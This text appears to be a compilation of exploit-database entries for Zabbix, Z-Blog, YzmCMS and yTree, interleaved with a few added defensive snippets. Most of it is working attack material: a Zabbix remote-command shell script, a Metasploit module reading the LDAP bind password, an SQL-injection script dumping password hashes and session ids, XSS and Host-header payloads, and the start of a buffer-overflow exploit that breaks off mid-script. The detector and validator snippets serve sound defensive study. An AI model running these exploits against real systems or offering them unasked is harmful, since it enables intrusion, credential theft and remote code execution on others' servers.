Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.
Proof of Concept:
=====================
latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
Result:
SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
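An added example, not part of the advisory: a small POSIX shell detector that percent-decodes web-server access-log lines and flags any latest.php request whose toggle_ids[] value is not a plain decimal id, which is the only shape the profile-toggle code ever expects. The log lines, the function names and the log format are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the advisory): flag requests to latest.php in which a
# toggle_ids[] value is anything other than a decimal id. Even URL-encoded, the
# PoC value "15385); select * from users where (1=1" cannot pass this check.
# Sample log lines below are constructed for this example (combined log format).

SAMPLE_LOG='10.0.0.5 - - [11/Aug/2016:10:01:02 +0000] "GET /zabbix/latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids%5B%5D=15385 HTTP/1.1" 200 512
10.0.0.9 - - [11/Aug/2016:10:01:07 +0000] "GET /zabbix/latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids%5B%5D=15385%29%3B%20select%20%2A%20from%20users%20where%20%281%3D1 HTTP/1.1" 200 734
10.0.0.5 - - [11/Aug/2016:10:01:09 +0000] "GET /zabbix/latest.php?ddreset=1 HTTP/1.1" 200 19239'

# Percent-decode one string with POSIX awk: '+' becomes a space, %XX becomes the byte.
urldecode() {
    printf '%s\n' "$1" | awk '
        BEGIN { hex = "0123456789abcdef" }
        {
            s = $0; out = ""
            gsub(/\+/, " ", s)
            while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
                hi = index(hex, tolower(substr(s, RSTART + 1, 1))) - 1
                lo = index(hex, tolower(substr(s, RSTART + 2, 1))) - 1
                out = out substr(s, 1, RSTART - 1) sprintf("%c", hi * 16 + lo)
                s = substr(s, RSTART + RLENGTH)
            }
            print out s
        }'
}

# Print the decoded toggle_ids[] value of one log line (last occurrence), or nothing.
# The value ends at the next "&", space or quote, so a decoded ")" or ";" stays in it.
toggle_ids_value() {
    urldecode "$1" | sed -n 's/.*toggle_ids\[]=\([^& "]*\).*/\1/p'
}

# Read log lines on stdin, print each suspicious line, return 0 if any were found.
flag_toggle_ids_sqli() {
    hits=0
    while IFS= read -r line; do
        case "$line" in
            *latest.php*toggle_ids*) ;;
            *) continue ;;
        esac
        val=$(toggle_ids_value "$line")
        case "$val" in
            '' | *[!0-9]*)
                hits=$((hits + 1))
                printf 'SUSPICIOUS: %s\n' "$line" ;;
        esac
    done
    [ "$hits" -gt 0 ]
}
```

Feed a real access log with `printf '%s\n' "$SAMPLE_LOG" | flag_toggle_ids_sqli` replaced by `flag_toggle_ids_sqli < /var/log/apache2/access.log` (path is an assumption); the function exits 0 only when at least one line was flagged.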
Disclosure Timeline:
=====================
7/18/2016 - Reported vulnerability to Zabbix
7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public
7/22/2016 - Zabbix released patch for vulnerability
8/3/2016 - CVE details submitted
8/11/2016 - Vulnerability details disclosed
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A
import requests
import json
import readline

ZABIX_ROOT = 'http://192.168.66.2'        ### Zabbix IP-address
url = ZABIX_ROOT + '/api_jsonrpc.php'     ### Don't edit
login = 'Admin'                           ### Zabbix login
password = 'zabbix'                       ### Zabbix password
hostid = '10084'                          ### Zabbix hostid

### auth
payload = {
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        'user': login,
        'password': password,
    },
    "auth": None,
    "id": 0,
}
headers = {
    'content-type': 'application/json',
}
auth = requests.post(url, data=json.dumps(payload), headers=headers)
auth = auth.json()

while True:
    cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
    if cmd == "": print "Result of last command:"
    if cmd == "quit": break

    ### update
    payload = {
        "jsonrpc": "2.0",
        "method": "script.update",
        "params": {
            "scriptid": "1",
            "command": cmd
        },
        "auth": auth['result'],
        "id": 0,
    }
    cmd_upd = requests.post(url, data=json.dumps(payload), headers=headers)

    ### execute
    payload = {
        "jsonrpc": "2.0",
        "method": "script.execute",
        "params": {
            "scriptid": "1",
            "hostid": hostid
        },
        "auth": auth['result'],
        "id": 0,
    }
    cmd_exe = requests.post(url, data=json.dumps(payload), headers=headers)
    cmd_exe = cmd_exe.json()
    print cmd_exe["result"]["value"]
##
# This module requires Metasploit
# Date: 25-09-2013
# Author: Pablo González
# Vendor Homepage: Zabbix -> http://www.zabbix.com
# Software Link: http://www.zabbix.com
# Version: 2.0.5
# Tested On: Linux (Ubuntu, Suse, CentOS)
# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
# http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
# http://seclists.org/fulldisclosure/2013/Sep/151
# http://www.cvedetails.com/cve/CVE-2013-5572/
##
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ldap_bind_password Zabbix CVE-2013-5572',
      'Description' => %q{
        Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [ '@pablogonzalezpe, Pablo Gonzalez' ]
    ))

    register_options([
      OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
      OptString.new('TARGETURI', [true, 'Path Zabbix Authentication', '/zabbix/authentication.php']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end

  def run
    req
  end

  def req
    resp = send_request_cgi(
      {
        'host'         => datastore['RHOST'],
        'method'       => 'POST',
        'uri'          => normalize_uri(target_uri.path.to_s),
        'cookie'       => "zbx_sessionid=#{datastore['zbx_session']}",
        'content-type' => 'application/x-www-form-urlencoded'
      }, datastore['TIMEOUT'])

    # send_request_cgi returns nil on connection failure/timeout
    return if resp.nil?

    ldap_host(resp)
    user_passDomain(resp)
    user_zabbix(resp)
  end

  def ldap_host(response)
    cut = response.body.split("ldap_host\" value=\"")[1]
    if cut != nil
      host = cut.split("\"")[0]
      print_good "LDAP Host => #{host}"
    end
  end

  def user_passDomain(response)
    cut = response.body.split("ldap_bind_dn\" value=\"")[1]
    if cut != nil
      user = cut.split("\"")[0]
      print_good "User Domain? => #{user}"
    end

    cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
    if cut != nil
      pass = cut.split("\"")[0]
      print_good "Password Domain? => #{pass}"
    end
  end

  def user_zabbix(response)
    cut = response.body.split("user\" value=\"")[1]
    if cut != nil
      user = cut.split("\"")[0]
      print_good "User Zabbix => #{user}"
    end
  end
end
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Data: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)
# PoC Author: Zzzians
# Contact: Zzzians@gmail.com
# Test on: Linux (Debian/CentOS/Ubuntu)
# -*- coding: utf_8 -*-
# Use Shodan or and enjoy :)
# Comb the intranet for zabbix and enjoy :)
import sys,os,re,urllib2

def Inject(url,sql,reg):
    payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(payload, timeout=20).read()
    except Exception, msg:
        print '\t\tOpps,an error occurs...',msg
    else:
        result_reg = re.compile(reg)
        results = result_reg.findall(response)
        #print payload #Uncomment this to see details
        if results:
            return results[0]

def exploit(url,userid):
    passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
    if(password):
        print '[+]Username~Password : %s' % password
    else:
        print '[-]Get Password Failed'
    session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
    if(session_id):
        print "[+]Session_id:%s" % session_id
    else:
        print "[-]Get Session id Failed"
    print '\n'

def main():
    print '=' * 70
    print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'
    print '\t\t Author:Zzzians(Zzzians@gmail.com)'
    print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
    print '\t\t\t Time:2016-08-20\n'
    urls = ["http://10.15.5.86"]
    ids = [1,2]
    for url in urls:
        if url[-1] != '/': url += '/'
        print '='*25 + url + '='*25
        for userid in ids:
            exploit(url,userid)

main()
# Exploit Title: Z-Blog 1.5.1.1740 Web Site physical path leakage Vulnerability
# Date: 2018-04-03
# Exploit Author: zzw (zzw@5ecurity.cn)
# Vendor Homepage: https://www.zblogcn.com/
# Software Link: https://github.com/zblogcn/zblogphp
# Version: 1.5.1.1740
# CVE : CVE-2018-7737
This is a web site physical path leakage vulnerability.
poc (visit the following pages):
http://localhost/z-blog//zb_system/admin/admin_footer.php
http://localhost/z-blog//zb_system/admin/admin_header.php
http://localhost/z-blog//zb_system/admin/admin_left.php
http://localhost/z-blog//zb_system/admin/admin_top.php
http://localhost/z-blog//zb_system/function/c_system_admin.php
http://localhost/z-blog//zb_system/function/c_system_misc.php
http://localhost/z-blog//zb_system/function/lib/category.php
http://localhost/z-blog//zb_system/function/lib/comment.php
http://localhost/z-blog//zb_system/function/lib/dbmysql.php
http://localhost/z-blog//zb_system/function/lib/dbmysqli.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php
http://localhost/z-blog//zb_system/function/lib/dbpgsql.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php
http://localhost/z-blog//zb_system/function/lib/member.php
http://localhost/z-blog//zb_system/function/lib/module.php
http://localhost/z-blog//zb_system/function/lib/networkcurl.php
http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php
http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php
http://localhost/z-blog//zb_system/function/lib/post.php
http://localhost/z-blog//zb_system/function/lib/sqlmysql.php
http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php
http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php
http://localhost/z-blog//zb_system/function/lib/tag.php
http://localhost/z-blog//zb_system/function/lib/upload.php
http://localhost/z-blog//zb_users/cache/compiled/default/comment.php
http://localhost/z-blog//zb_users/cache/compiled/default/comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/index.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-archives.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-authors.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-catalog.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-previous.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-statistics.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-tags.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-multi.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-page.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-single.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar2.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar3.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar4.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar5.php
http://localhost/z-blog//zb_users/cache/compiled/default/single.php
http://localhost/z-blog//zb_users/plugin/AppCentre/include.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkcurl.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfile_get_contents.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfsockopen.php
http://localhost/z-blog//zb_users/plugin/STACentre/include.php
http://localhost/z-blog//zb_users/plugin/Totoro/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_crawler.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_upload.php
http://localhost/z-blog//zb_users/theme/default/include.php
http://localhost/z-blog//zb_users/theme/metro/include.php
http://localhost/z-blog//zb_users/theme/WhitePage/include.php
the web site will respond with an error such as:
Fatal error: Interface 'iDataBase' not found in C:\phpStudy\WWW\Z-Blog\zb_system\function\lib\dbsqlite3.php on line 8
# Exploit Title: Z-Blog 1.5.1.1740 XSS Vulnerability
# Date: 2018-04-03
# Exploit Author: zzw (zzw@5ecurity.cn)
# Vendor Homepage: https://www.zblogcn.com/
# Software Link: https://github.com/zblogcn/zblogphp
# Version: 1.5.1.1740
# CVE : CVE-2018-7736
This is an XSS vulnerability that can be used to attack users.
poc:
poc of ZC_BLOG_SUBNAME parameter:
http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&token=2c7ca9a4c1c3d856e012595ca878564f
post_data:
ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=
poc of ZC_UPLOAD_FILETYPE parameter:
post_data:
ZC_BLOG_HOST=http://localhost/z-blog/&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good+Luck+To+You!&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia/Shanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek"><script>alert(1)</script>ekkgh&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=
# Exploit Title: YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-03-10
# Exploit Author: En
# Vendor Homepage: https://github.com/yzmcms/yzmcms
# Software Link: https://github.com/yzmcms/yzmcms
# Version: V5.5
# Category: Web Application
# Patched Version: unpatched
# Tested on: Win10x64
# Platform: PHP
# CVE : N/A
#Exploit Author: En_dust
#Description:
#The add function defined in the Application/link/controller/link.class.php file does not filter the ‘url’ parameter, causing malicious code to be executed.
#PoC:
POST /yzmcms/link/link/add.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/yzmcms/link/link/add.html
Content-Length: 130
Cookie: CNZZDATA1261218610=2106045875-1559549499-%7C1569374982; PHPSESSID=fr095t87brjfc0l7d7sgj8oml4; yzmphp_adminid=45dfDWXXjGQg2Ce7Yg7oJZbld7iy8SN43sy2SKjq; yzmphp_adminname=7e49R0HXcjLHqBu5wgd9vXbD_D-Bq3Uq8TLw5UNpi8lIAw
DNT: 1
Connection: close
name=evalWebsite&url=javascript%3Aalert(%2FXSS%2F)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1
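As an added defensive example (not YzmCMS's own code), this Python shows the check the add function described above lacks: it canonicalises the url parameter the way a browser would before looking at the scheme, accepts only http and https, and HTML-escapes the value when the link is rendered. The function and constant names are this example's own.

```python
import re
from html import escape
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Browsers strip leading/trailing C0 controls and spaces, delete tab, newline
# and carriage return anywhere in a URL, and match schemes case-insensitively.
# Undo the same things before checking the scheme, or "java\nscript:" and
# " JaVaScRiPt:" pass a naive startswith("javascript:") test.
_LEADING_TRAILING = "".join(chr(c) for c in range(0x21))
_INSIDE = re.compile(r"[\t\n\r]")
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def validate_link_url(raw):
    """Return a canonical http(s) URL worth storing, or None to reject the
    submission. The form decoder has already percent-decoded the field once
    (the PoC sends url=javascript%3Aalert(%2FXSS%2F)), so what arrives here
    is the literal 'javascript:alert(/XSS/)'."""
    if raw is None:
        return None
    url = _INSIDE.sub("", raw.strip(_LEADING_TRAILING))
    m = _SCHEME_RE.match(url)
    if not m:
        return None  # relative or scheme-less ("//host/x", "example.org"): reject
    if m.group(1).lower() not in ALLOWED_SCHEMES:
        return None  # javascript:, data:, vbscript:, file:, ...
    parts = urlsplit(url)
    if not parts.netloc or any(c in parts.netloc for c in "<>\"'"):
        return None
    return parts.geturl()


def render_link(name, url):
    """Emit the anchor for the links page. escape(quote=True) turns the quote
    and angle brackets of a '"><script>' payload into entities, so even a bad
    stored value cannot break out of the href attribute or the text node."""
    return '<a href="%s">%s</a>' % (escape(url, quote=True),
                                    escape(name, quote=True))
```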
# Exploit Title: YzmCMS 5.3 - 'Host' Header Injection
# Exploit Author: Debashis Pal
# Vendor Homepage: http://www.yzmcms.com/
# Source: https://github.com/yzmcms/yzmcms
# Version: YzmCMS V5.3
# CVE : N/A
# Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9
#About YzmCMS
==============
YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework.
#Vulnerability
===============
Host Header Injection.
#PoC
=====
#YzmCMS V5.3 Access Path: TARGET/yzmcms/
curl http://TARGET/yzmcms/ -H "Host: www.google.com"
//sample output start
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>YzmCMS - 演示站</title>
<link href="http://www.google.com/yzmcms/common/static/css/default_common.css" rel="stylesheet" type="text/css" />
<link href="http://www.google.com/yzmcms/common/static/css/default_index.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/jquery-1.8.2.min.js"></script>
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/js.js"></script>
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/koala.min.1.5.js"></script> <!-- 焦点图js -->
<meta name="keywords" content="yzmcms,YzmCMS演示站,yzmcms站点" />
<meta name="description" content="本站是yzmcms演示站点" />
<meta http-equiv="mobile-agent" content="format=xhtml;url=http://TARGET/yzmcms/index.php?m=mobile">
<script type="text/javascript">if(window.location.toString().indexOf('pref=padindex') != -1){}else{if(/AppleWebKit.*Mobile/i.test(navigator.userAgent) || (/MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(navigator.userAgent))){if(window.location.href.indexOf("?mobile")<0){try{if(/Android|Windows Phone|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)){window.location.href="http://TARGET/yzmcms/index.php?m=mobile";}else if(/iPad/i.test(navigator.userAgent)){}else{}}catch(e){}}}}</script>
</head>
<body>
<!--mini登陆条-->
<div id="head_login">
<div class="w1000">
<div id="mini">
<a href="http://www.google.com/yzmcms/member/index/register.html" target="_blank">注册</a> <a href="http://www.google.com/yzmcms/member/index/login.html" target="_blank">登录</a>
</div>
欢迎光临本站!
</div>
</div>
<!--网站容器-->
<div id="container">
<div id="header">
<div id="logo">
<a href="http://TARGET/yzmcms/"><img src="http://www.google.com/yzmcms/common/static/images/logo.png" title="YzmCMS - 演示站" alt="YzmCMS - 演示站"></a>
</div>
<div id="search">
<form method="get" action="http://www.google.com/yzmcms/index.php" target="_blank">
<div id="searchtxt" class="searchtxt">
<div class="searchmenu">
//sample output End
#Solution
==========
Don't trust the Host header. Only allow whitelisted hostnames.
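As an added example of that solution (not YzmCMS's own code), this Python resolves the hostname for absolute URLs only from an allowlist, so a request with Host: www.google.com can no longer end up in the stylesheet and login links shown in the sample output. It assumes a WSGI-style environ dict; the allowlist, APP_PATH and the function names are this example's own.

```python
import re

# Constructed deployment configuration (not YzmCMS's own): the hostnames this
# site is really served under. Anything else in the Host header is ignored.
ALLOWED_HOSTS = {"www.example.com", "example.com"}
APP_PATH = "/yzmcms/"

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen.
_HOSTNAME_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$"
)


def normalize_host(header_value):
    """Canonicalise a raw Host header: lowercase, drop a :port suffix and a
    trailing dot. Returns None when the header is absent or is not a
    syntactically valid hostname (bracketed IPv6 literals are rejected here
    to keep the example short)."""
    if header_value is None:
        return None
    host = header_value.strip().lower()
    if host.startswith("["):
        return None
    host = host.split(":", 1)[0].rstrip(".")
    if not host or not _HOSTNAME_RE.match(host):
        return None
    return host


def resolve_host(environ):
    """Return the hostname absolute URLs may be built from, or None when the
    request's Host header is not on the allowlist. X-Forwarded-Host is
    deliberately not consulted: a proxy that needs it should rewrite Host."""
    host = normalize_host(environ.get("HTTP_HOST"))
    return host if host in ALLOWED_HOSTS else None


def absolute_url(environ, relative_path, scheme="http"):
    """Build the kind of absolute URL the sample output shows (stylesheet and
    login links) from an allowlisted host only. Raises ValueError so the
    caller can answer 400 instead of reflecting an attacker-chosen host."""
    host = resolve_host(environ)
    if host is None:
        raise ValueError("Host header %r is not an allowed hostname"
                         % environ.get("HTTP_HOST"))
    return "%s://%s%s%s" % (scheme, host, APP_PATH, relative_path.lstrip("/"))
```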
#Disclosure Timeline
====================
Vulnerability Discover Date: 18-Sep-2019
Vulnerability Notification To vendor via Email: 18-Sep-2019, no response
Open issue in github : 22-Sep-2019, no response
Submit exploit-db : 25-Sep-2019
#Disclaimer
==========
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
# Exploit Title: YzmCMS 3.6 XSS Vulnerability
# Date: 2018-04-03
# Exploit Author: zzw (zzw@5ecurity.cn)
# Vendor Homepage: http://www.yzmcms.com/
# Software Link: http://www.yzmcms.com/
# Version: 3.6
# CVE : CVE-2018-7653
This is an XSS vulnerability that can be used to attack users.
poc:
http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes
http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes
http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes
http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes
# Exploit Author: Juan Sacco - http://www.exploitpack.com -jsacco@exploitpack.com
# Program affected: yTree - File manager for terminals v1.94-1.1
# Description: yTree is prone to a stack-based overflow, an attacker could exploit
# this issue to execute arbitrary code in the context of the application.
# Failed exploit attempts will result in a denial-of-service condition.
#
# Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org
#
# Program Description: This is a file manager that separates files from directories
# and allows you to select and manage files from different directories.
# It works on black and white or color terminals and is UTF-8 locales aware.
# Vendor homepage: http://www.han.de/~werner/ytree.html
# Kali Linux 2.0 package: pool/main/y/ytree/ytree_1.94-1.1_i386.deb
# MD5sum: 7d55d9c7e8afb4405c149463613f596b
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x41414141 EBX: 0xB7FB8000 ECX: 0x00000000 EDX: 0x08071342 o d I t s z a P c
# ESI: 0xBFFFF134 EDI: 0x41414141 EBP: 0x0806FC60 ESP: 0xBFFFDC50 EIP: 0xB7F888C1
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
# --------------------------------------------------------------------------[code]
# => 0xb7f888c1 <werase+49>: mov eax,DWORD PTR [eax+0x4c]
# 0xb7f888c4 <werase+52>: mov DWORD PTR [esp+0x24],eax
# 0xb7f888c8 <werase+56>: mov eax,DWORD PTR [edi+0x50]
# 0xb7f888cb <werase+59>: mov DWORD PTR [esp+0x28],eax
# 0xb7f888cf <werase+63>: mov eax,DWORD PTR [edi+0x54]
# 0xb7f888d2 <werase+66>: mov DWORD PTR [esp+0x2c],eax
# 0xb7f888d6 <werase+70>: mov eax,DWORD PTR [edi+0x58]
# 0xb7f888d9 <werase+73>: mov DWORD PTR [esp+0x30],eax
# --------------------------------------------------------------------------------
# 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
# gdb$ backtrace
# 0 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
# 1 0x08050f43 in ?? ()
# 2 0x08051182 in ?? ()
# 3 0x0805972f in ?? ()
# 4 0x0804a68a in ?? ()
# 5 0xb7d82a63 in __libc_start_main (main=0x804a560, argc=0x2, argv=0xbffff294, init=0x8064df0, fini=0x8064de0, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff28c) at libc-start.c:287
# 6 0x0804a701 in ?? ()
import os,sys,subprocess,errno

def run():
    try:
        print "# yTree Buffer Overflow by Juan Sacco"
        print "# It's fuzzing time on unusable exploits"
        print "# This exploit is for educational purposes only"
        # JUNK + SHELLCODE + NOPS + EIP
        junk = "\x41"*65
